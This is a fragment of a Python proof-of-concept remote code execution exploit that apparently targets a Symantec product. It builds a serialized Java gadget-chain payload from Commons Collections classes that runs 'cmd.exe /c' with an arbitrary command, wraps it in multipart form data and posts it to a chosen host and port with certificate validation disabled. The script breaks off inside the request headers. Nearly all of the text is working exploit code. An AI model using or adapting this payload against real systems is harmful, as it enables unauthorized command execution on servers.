java_payload = '\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x04\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x25\\x63\\x6f\\x6d\\x2e\\x73\\x79\\x67\\x61\\x74\\x65\\x2e\\x73\\x63\\x6d\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x52\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0e\\x72\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x4c\\x69\\x6e\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x76\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x01\\x75\\x71\\x00\\x7e\\x00\\x20\\x00\\x00\\x00\\x03\\x74\\x00\\x07\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x74\\x00\\x02\\x2f\\x63\\x74\\x00'\r

\r

cleng = len(_cmd)\r

java_payload += chr(cleng) + _cmd\r

java_payload += '\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a'\r

\r

fullpayload = \"\"\"------=_Part_0_992568364.1449677528532\r

Content-Type: application/binary\r

Content-Disposition: form-data; name=\"Content\"\r

\r

%s \r

\r

------=_Part_0_992568364.1449677528532--\r

\"\"\" % java_payload\r

\r

if SSL_On:\r

webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r

URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r

else:\r

webservice = httplib2.Http()\r

URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r

\r

headers = {\"User-Agent\":\"Symantec_RCE_POC\",\r

\"Content-type\":\"multipart/form-data;\",\r

\"boundary\":\"----=_Part_0_992568364.1449677528532\",\r

\"Accept\":\"text/html, image/gif, ima